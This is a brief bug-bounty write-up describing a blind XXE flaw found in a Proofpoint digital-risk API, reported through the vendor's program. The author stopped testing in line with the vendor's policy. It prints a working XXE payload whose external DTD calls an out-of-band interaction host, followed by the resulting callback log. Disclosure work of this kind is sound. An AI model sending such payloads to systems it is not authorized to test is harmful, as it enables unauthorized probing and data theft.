A simple Blind XXE in Proofpoint
This post is about a Blind XXE vulnerability in Proofpoint. In which, earned me their Hall of Fame recognition. https://www.proofpoint.com/us/security/hall-of-fame
Browsing the application #
While browsing the target with Caido I stumbled accross an interesting POST based, XML API call that caught my attention at “api.digitalrisk.proofpoint.com”, so I sent the request to the replay tab.
After playing around with the request for a bit and testing for XXE, I received a hit, confirming the vulnerability.
Confirming the XXE #
I included the following interactsh XXE payload in the request:
<?xml version="1.0"?>
<!DOCTYPE test SYSTEM "http://cj9rp6uhf2qjvdap1jv07eftruo5a4ydq.oast.online">
<data>&test;</data>
After sending the request, I received a HTTP and DNS interaction as you can see below:
[cj9rp6uhf2qjvdap1jv07eftruo5a4ydq] Received DNS interaction (A) from █████████████████████████████
[cj9rp6uhf2qjvdap1jv07eftruo5a4ydq] Received HTTP interaction from █████████████████████████████
[cj9rp6UhF2qjVdAp1jv07eftRUO5A4yDq] Received DNS interaction (A) from █████████████████████████████
[Cj9RP6UHf2QJvdAp1JV07eFTrUo5a4Ydq] Received DNS interaction (AAAA) from █████████████████████████████
[cj9rp6uhf2qjvdap1jv07eftruo5a4ydq] Received DNS interaction (A) from █████████████████████████████
[cJ9rp6uHF2QJvDap1Jv07EFTRUO5a4YDq] Received DNS interaction (NS) from ███████████████████████
I wanted to try and escalate the vulnerability, but Proofpoint explicitly stated “If you believe you have discovered a vulnerability in Proofpoint Products: Cease further testing and promptly submit a report.”
But I had a fun time discovering this vulnerability in the cybersecurity company, Proofpoint.